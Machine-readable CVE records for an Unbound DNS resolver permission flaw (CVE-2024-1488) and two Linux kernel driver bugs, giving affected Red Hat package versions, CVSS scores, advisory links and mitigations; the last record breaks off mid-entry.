{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2024-1488", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-02-15T18:02:37.532018Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-07-05T17:22:53.092Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-01T18:40:21.182Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "RHSA-2024:1750", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1750" }, { "name": "RHSA-2024:1751", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1751" }, { "name": "RHSA-2024:1780", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1780" }, { "name": "RHSA-2024:1801", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1801" }, { "name": "RHSA-2024:1802", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1802" }, { "name": "RHSA-2024:1804", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1804" }, { "name": "RHSA-2024:2587", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2587" }, { "name": "RHSA-2024:2696", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2696" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2024-1488" }, { "name": "RHBZ#2264183", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2264183" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://src.fedoraproject.org/rpms/unbound/", "defaultStatus": "unaffected", "packageName": "unbound", "versions": [ { "status": "affected", "version": "1.16.2" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::appstream" ], "defaultStatus": "affected", "packageName": "unbound", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.16.2-5.el8_9.6", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_tus:8.2::appstream", "cpe:/a:redhat:rhel_e4s:8.2::appstream", "cpe:/a:redhat:rhel_aus:8.2::appstream" ], "defaultStatus": "affected", "packageName": "unbound", "product": "Red Hat Enterprise Linux 8.2 Advanced Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.7.3-12.el8_2.1", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_tus:8.2::appstream", "cpe:/a:redhat:rhel_e4s:8.2::appstream", "cpe:/a:redhat:rhel_aus:8.2::appstream" ], "defaultStatus": "affected", "packageName": "unbound", "product": "Red Hat Enterprise Linux 8.2 Telecommunications Update Service", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.7.3-12.el8_2.1", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_tus:8.2::appstream", "cpe:/a:redhat:rhel_e4s:8.2::appstream", "cpe:/a:redhat:rhel_aus:8.2::appstream" ], "defaultStatus": "affected", "packageName": "unbound", "product": "Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.7.3-12.el8_2.1", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_tus:8.4::appstream", "cpe:/a:redhat:rhel_aus:8.4::appstream", "cpe:/a:redhat:rhel_e4s:8.4::appstream" ], "defaultStatus": "affected", "packageName": "unbound", "product": "Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.7.3-15.el8_4.1", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_tus:8.4::appstream", "cpe:/a:redhat:rhel_aus:8.4::appstream", "cpe:/a:redhat:rhel_e4s:8.4::appstream" ], "defaultStatus": "affected", "packageName": "unbound", "product": "Red Hat Enterprise Linux 8.4 Telecommunications Update Service", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.7.3-15.el8_4.1", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_tus:8.4::appstream", "cpe:/a:redhat:rhel_aus:8.4::appstream", "cpe:/a:redhat:rhel_e4s:8.4::appstream" ], "defaultStatus": "affected", "packageName": "unbound", "product": "Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.7.3-15.el8_4.1", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:8.6::appstream" ], "defaultStatus": "affected", "packageName": "unbound", "product": "Red Hat Enterprise Linux 8.6 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.7.3-17.el8_6.4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:8.8::appstream" ], "defaultStatus": "affected", "packageName": "unbound", "product": "Red Hat Enterprise Linux 8.8 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.16.2-5.el8_8.4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "unbound", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.16.2-3.el9_3.5", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.0::appstream" ], "defaultStatus": "affected", "packageName": "unbound", "product": "Red Hat Enterprise Linux 9.0 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.13.1-13.el9_0.4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.2::crb", "cpe:/a:redhat:rhel_eus:9.2::appstream" ], "defaultStatus": "affected", "packageName": "unbound", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.16.2-3.el9_2.4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unaffected", "packageName": "unbound", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "unbound", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" } ], "datePublic": "2024-02-13T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "A vulnerability was found in Unbound due to incorrect default permissions, allowing any process outside the unbound group to modify the unbound runtime configuration. If a process can connect over localhost to port 8953, it can alter the configuration of unbound.service. This flaw allows an unprivileged attacker to manipulate a running instance, potentially altering forwarders, allowing them to track all queries forwarded by the local resolver, and, in some cases, disrupting resolving altogether." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Important" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 8, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-15", "description": "External Control of System or Configuration Setting", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-11-06T14:50:17.167Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2024:1750", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1750" }, { "name": "RHSA-2024:1751", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1751" }, { "name": "RHSA-2024:1780", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1780" }, { "name": "RHSA-2024:1801", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1801" }, { "name": "RHSA-2024:1802", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1802" }, { "name": "RHSA-2024:1804", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1804" }, { "name": "RHSA-2024:2587", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2587" }, { "name": "RHSA-2024:2696", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2696" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2024-1488" }, { "name": "RHBZ#2264183", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2264183" } ], "timeline": [ { "lang": "en", "time": "2024-02-14T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2024-02-13T00:00:00+00:00", "value": "Made public." } ], "title": "Unbound: unrestricted reconfiguration enabled to anyone that may lead to local privilege escalation", "workarounds": [ { "lang": "en", "value": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability." } ], "x_redhatCweChain": "CWE-276-\u003eCWE-15: Incorrect Default Permissions leads to External Control of System or Configuration Setting" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2024-1488", "datePublished": "2024-02-15T05:04:13.994Z", "dateReserved": "2024-02-14T12:47:25.283Z", "dateUpdated": "2024-11-06T14:50:17.167Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-43975
Vulnerability from cvelistv5
Published
2021-11-17 16:32
Modified
2024-08-04 04:10
Severity ?
EPSS score ?
Summary
In the Linux kernel through 5.15.2, hw_atl_utils_fw_rpc_wait in drivers/net/ethernet/aquantia/atlantic/hw_atl/hw_atl_utils.c allows an attacker (who can introduce a crafted device) to trigger an out-of-bounds write via a crafted length value.
References
▼ | URL | Tags |
---|---|---|
https://lore.kernel.org/netdev/163698540868.13805.17800408021782408762.git-patchwork-notify%40kernel.org/T/ | x_refsource_MISC | |
https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/commit/?id=b922f622592af76b57cbc566eaeccda0b31a3496 | x_refsource_MISC | |
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X24M7KDC4OJOZNS3RDSYC7ELNELOLQ2N/ | vendor-advisory, x_refsource_FEDORA | |
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YODMYMGZYDXQKGJGX7TJG4XV4L5YLLBD/ | vendor-advisory, x_refsource_FEDORA | |
https://security.netapp.com/advisory/ntap-20211210-0001/ | x_refsource_CONFIRM | |
https://lists.debian.org/debian-lts-announce/2022/03/msg00012.html | mailing-list, x_refsource_MLIST | |
https://www.debian.org/security/2022/dsa-5096 | vendor-advisory, x_refsource_DEBIAN |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T04:10:17.165Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://lore.kernel.org/netdev/163698540868.13805.17800408021782408762.git-patchwork-notify%40kernel.org/T/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/commit/?id=b922f622592af76b57cbc566eaeccda0b31a3496" }, { "name": "FEDORA-2021-eab8c5a263", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X24M7KDC4OJOZNS3RDSYC7ELNELOLQ2N/" }, { "name": "FEDORA-2021-c09b851eb0", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YODMYMGZYDXQKGJGX7TJG4XV4L5YLLBD/" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20211210-0001/" }, { "name": "[debian-lts-announce] 20220309 [SECURITY] [DLA 2941-1] linux-4.19 security update", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/03/msg00012.html" }, { "name": "DSA-5096", "tags": [ "vendor-advisory", "x_refsource_DEBIAN", "x_transferred" ], "url": "https://www.debian.org/security/2022/dsa-5096" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "In the Linux kernel through 5.15.2, hw_atl_utils_fw_rpc_wait in drivers/net/ethernet/aquantia/atlantic/hw_atl/hw_atl_utils.c allows an attacker (who can introduce a crafted device) to trigger an out-of-bounds write via a crafted length value." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-03-10T02:06:54", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://lore.kernel.org/netdev/163698540868.13805.17800408021782408762.git-patchwork-notify%40kernel.org/T/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/commit/?id=b922f622592af76b57cbc566eaeccda0b31a3496" }, { "name": "FEDORA-2021-eab8c5a263", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X24M7KDC4OJOZNS3RDSYC7ELNELOLQ2N/" }, { "name": "FEDORA-2021-c09b851eb0", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YODMYMGZYDXQKGJGX7TJG4XV4L5YLLBD/" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://security.netapp.com/advisory/ntap-20211210-0001/" }, { "name": "[debian-lts-announce] 20220309 [SECURITY] [DLA 2941-1] linux-4.19 security update", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "https://lists.debian.org/debian-lts-announce/2022/03/msg00012.html" }, { "name": "DSA-5096", "tags": [ "vendor-advisory", "x_refsource_DEBIAN" ], "url": "https://www.debian.org/security/2022/dsa-5096" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2021-43975", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "In the Linux kernel through 5.15.2, hw_atl_utils_fw_rpc_wait in drivers/net/ethernet/aquantia/atlantic/hw_atl/hw_atl_utils.c allows an attacker (who can introduce a crafted device) to trigger an out-of-bounds write via a crafted length value." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://lore.kernel.org/netdev/163698540868.13805.17800408021782408762.git-patchwork-notify@kernel.org/T/", "refsource": "MISC", "url": "https://lore.kernel.org/netdev/163698540868.13805.17800408021782408762.git-patchwork-notify@kernel.org/T/" }, { "name": "https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/commit/?id=b922f622592af76b57cbc566eaeccda0b31a3496", "refsource": "MISC", "url": "https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/commit/?id=b922f622592af76b57cbc566eaeccda0b31a3496" }, { "name": "FEDORA-2021-eab8c5a263", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/X24M7KDC4OJOZNS3RDSYC7ELNELOLQ2N/" }, { "name": "FEDORA-2021-c09b851eb0", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YODMYMGZYDXQKGJGX7TJG4XV4L5YLLBD/" }, { "name": "https://security.netapp.com/advisory/ntap-20211210-0001/", "refsource": "CONFIRM", "url": "https://security.netapp.com/advisory/ntap-20211210-0001/" }, { "name": "[debian-lts-announce] 20220309 [SECURITY] [DLA 2941-1] linux-4.19 security update", "refsource": "MLIST", "url": "https://lists.debian.org/debian-lts-announce/2022/03/msg00012.html" }, { "name": "DSA-5096", "refsource": "DEBIAN", "url": "https://www.debian.org/security/2022/dsa-5096" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2021-43975", "datePublished": "2021-11-17T16:32:30", "dateReserved": "2021-11-17T00:00:00", "dateUpdated": "2024-08-04T04:10:17.165Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-33952
Vulnerability from cvelistv5
Published
2023-07-24 15:19
Modified
2024-09-13 18:38
Severity ?
EPSS score ?
Summary
Kernel: vmwgfx: double free within the handling of vmw_buffer_object objects
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/errata/RHSA-2023:6583 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2023:6901 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2023:7077 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:1404 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:4823 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:4831 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/security/cve/CVE-2023-33952 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2218212 | issue-tracking, x_refsource_REDHAT | |
https://www.zerodayinitiative.com/advisories/ZDI-CAN-20292 |
Impacted products
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T15:54:14.153Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "RHSA-2023:6583", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2023:6583" }, { "name": "RHSA-2023:6901", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2023:6901" }, { "name": "RHSA-2023:7077", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2023:7077" }, { "name": "RHSA-2024:1404", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1404" }, { "name": "RHSA-2024:4823", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:4823" }, { "name": "RHSA-2024:4831", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:4831" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-33952" }, { "name": "RHBZ#2218212", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2218212" }, { "tags": [ "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-CAN-20292" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::realtime", "cpe:/a:redhat:enterprise_linux:8::nfv" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-513.5.1.rt7.307.el8_9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8::baseos", "cpe:/a:redhat:enterprise_linux:8::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-513.5.1.el8_9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.8::baseos", "cpe:/a:redhat:rhel_eus:8.8::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.8 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-477.51.1.el8_8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv", "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/a:redhat:enterprise_linux:9::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-362.8.1.el9_3", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv", "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/a:redhat:enterprise_linux:9::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-362.8.1.el9_3", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.2::crb", "cpe:/a:redhat:rhel_eus:9.2::appstream", "cpe:/o:redhat:rhel_eus:9.2::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-284.75.1.el9_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.2::realtime", "cpe:/a:redhat:rhel_eus:9.2::nfv" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-284.75.1.rt14.360.el9_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" } ], "datePublic": "2023-02-15T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "A double-free vulnerability was found in handling vmw_buffer_object objects in the vmwgfx driver in the Linux kernel. This issue occurs due to the lack of validating the existence of an object prior to performing further free operations on the object, which may allow a local privileged user to escalate privileges and execute code in the context of the kernel." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Moderate" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-415", "description": "Double Free", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-09-13T18:38:56.878Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2023:6583", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2023:6583" }, { "name": "RHSA-2023:6901", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2023:6901" }, { "name": "RHSA-2023:7077", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2023:7077" }, { "name": "RHSA-2024:1404", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1404" }, { "name": "RHSA-2024:4823", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:4823" }, { "name": "RHSA-2024:4831", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:4831" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-33952" }, { "name": "RHBZ#2218212", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2218212" }, { "url": "https://www.zerodayinitiative.com/advisories/ZDI-CAN-20292" } ], "timeline": [ { "lang": "en", "time": "2023-06-28T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-02-15T00:00:00+00:00", "value": "Made public." } ], "title": "Kernel: vmwgfx: double free within the handling of vmw_buffer_object objects", "workarounds": [ { "lang": "en", "value": "This flaw can be mitigated by preventing the affected `vmwgfx` kernel module from being loaded. For instructions on how to blacklist a kernel module, please see https://access.redhat.com/solutions/41278." } ], "x_redhatCweChain": "CWE-415: Double Free" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-33952", "datePublished": "2023-07-24T15:19:18.913Z", "dateReserved": "2023-05-24T07:11:47.572Z", "dateUpdated": 